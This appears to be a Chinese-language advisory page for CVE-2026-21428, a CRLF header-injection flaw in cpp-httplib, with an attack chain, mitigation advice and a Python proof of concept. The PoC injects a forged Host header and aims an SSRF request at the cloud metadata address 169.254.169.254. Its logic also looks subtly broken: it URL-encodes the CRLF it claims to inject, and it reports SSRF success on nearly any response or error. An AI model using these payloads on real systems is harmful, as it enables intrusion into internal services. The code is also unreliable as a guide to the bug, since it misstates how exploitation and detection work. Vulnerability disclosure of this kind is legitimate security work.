CVE-2026-21428 cpp-httplib HTTP头部注入漏洞

漏洞信息

漏洞编号

CVE-2026-21428

漏洞类型

HTTP头部注入/CRLF注入

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

cpp-httplib

漏洞概述

CVE-2026-21428是cpp-httplib库中的一个高危安全漏洞，该库是一个C++11单文件头文件跨平台HTTP/HTTPS库。漏洞存在于write_headers函数中，该函数在处理用户提供的HTTP头部值时，未对CR（回车）和LF（换行）字符进行过滤和验证。这一缺陷允许攻击者通过在头部值中注入CRLF字符来突破HTTP头部的边界限制，从而添加额外的HTTP头部、修改请求体内容或触发服务器端请求伪造（SSRF）攻击。当目标服务器支持HTTP/1.1管道化（pipelining）功能时（如Spring Boot、Python Twisted等），攻击者可以利用此漏洞实现更复杂的SSRF攻击链，访问内部网络资源或执行未授权操作。该漏洞影响0.30.0之前的所有版本，官方已在v0.30.0版本中修复此问题。

技术细节

该漏洞的根本原因在于cpp-httplib的write_headers函数缺乏对HTTP头部值中特殊字符的验证。HTTP协议规范要求头部字段值不能包含CR（\r）和LF（\n）字符，因为这些字符用于分隔不同的头部行。攻击者可以通过在头部值中注入\r\n序列来构造恶意请求，当服务器解析这些请求时，攻击者注入的额外头部会被当作合法的HTTP头部进行处理。具体来说，攻击者可以在Location头部注入302重定向到恶意URL，或在Host头部注入来操控请求路由。此外，通过CRLF注入修改请求体长度或内容，可以导致请求走私（Request Smuggling）问题。在支持HTTP/1.1管道化的服务器环境中，攻击者可以构造特殊的请求序列，利用管道化处理的时序特性来执行SSRF攻击，绕过防火墙访问内部服务。攻击成功的关键在于服务器对用户输入的头部值缺乏有效的过滤机制。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别使用cpp-httplib < 0.30.0版本的Web应用或服务

STEP 2

步骤2

准备攻击载荷：构造包含CRLF（\r\n）字符的HTTP头部值，用于突破头部边界

STEP 3

步骤3

发送恶意请求：向目标服务器发送带有注入CRLF字符的HTTP请求，如在自定义头部中注入额外头部或修改Host字段

STEP 4

步骤4

头部注入成功：服务器解析请求时，攻击者注入的CRLF序列使额外头部被当作合法HTTP头部处理

STEP 5

步骤5

HTTP管道化利用（可选）：如果目标服务器支持HTTP/1.1管道化，攻击者构造特殊的管道化请求序列，利用时序特性执行SSRF攻击

STEP 6

步骤6

内部资源访问：攻击者通过SSRF成功访问内部网络资源，如元数据服务、数据库或内部API

STEP 7

步骤7

数据窃取或进一步渗透：利用获取的内部资源访问权限进行数据窃取、横向移动或持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-21428 PoC - CRLF Injection in cpp-httplib
# This PoC demonstrates header injection via CRLF characters

import requests
import urllib.parse

def exploit_crlf_injection(target_url):
    """
    Exploit CRLF injection in cpp-httplib < 0.30.0
    Inject extra headers by using CRLF in header values
    """
    # Craft malicious header value with CRLF injection
    # Inject additional headers: X-Injected-Header and Host
    injected_headers = "\r\nX-Injected-Header: malicious_value\r\nHost: attacker-controlled.com"
    
    # URL encode the CRLF characters for HTTP request
    encoded_payload = urllib.parse.quote(injected_headers)
    
    # Target endpoint that uses cpp-httplib
    target = f"{target_url}/api/vulnerable_endpoint"
    
    # Craft the exploit request
    headers = {
        'User-Agent': 'CVE-2026-21428 PoC',
        'X-Custom-Header': f'normal_value{encoded_payload}',
        'Authorization': 'Bearer valid_token'
    }
    
    try:
        response = requests.get(target, headers=headers, timeout=10)
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Headers: {response.headers}")
        
        # Check if injection was successful
        if 'X-Injected-Header' in str(response.headers):
            print("[!] VULNERABLE: CRLF injection successful!")
            return True
        else:
            print("[*] Request sent, injection may need server-specific conditions")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return False

def ssrf_exploitation(target_url, internal_target):
    """
    SSRF attack via CRLF injection combined with HTTP pipelining
    """
    # SSRF payload using CRLF to manipulate Host header
    ssrf_payload = f"\r\nHost: {internal_target}"
    encoded_ssrf = urllib.parse.quote(ssrf_payload)
    
    headers = {
        'User-Agent': 'CVE-2026-21428 SSRF PoC',
        'X-Forwarded-Host': f'legitimate.com{encoded_ssrf}',
        'Connection': 'keep-alive'
    }
    
    print(f"[*] Attempting SSRF to internal target: {internal_target}")
    
    try:
        response = requests.get(target_url, headers=headers, timeout=10)
        if response.status_code in [200, 301, 302, 400, 502, 503]:
            print(f"[!] SSRF attempt completed - status: {response.status_code}")
            return True
    except Exception as e:
        print(f"[*] SSRF request sent: {e}")
        return True
    
    return False

if __name__ == "__main__":
    TARGET = "http://target-server:8080"
    INTERNAL_TARGET = "http://169.254.169.254/metadata"
    
    print("=" * 60)
    print("CVE-2026-21428 - cpp-httplib CRLF Injection PoC")
    print("=" * 60)
    
    # Test basic CRLF injection
    exploit_crlf_injection(TARGET)
    
    # Test SSRF exploitation
    ssrf_exploitation(TARGET, INTERNAL_TARGET)

影响范围

cpp-httplib < 0.30.0

防御指南

临时缓解措施

立即将cpp-httplib库升级到v0.30.0或更高版本，该版本在write_headers函数中添加了对CR和LF字符的检查，能够有效防止头部注入攻击。同时，建议审查所有使用该库的应用代码，确保所有HTTP头部值的处理都经过严格的输入验证。如果暂时无法升级，可考虑在应用层添加HTTP头部过滤逻辑，拒绝包含CRLF字符的请求。此外，在Web服务器层面配置请求过滤规则，拦截包含\r\n字符的可疑请求头。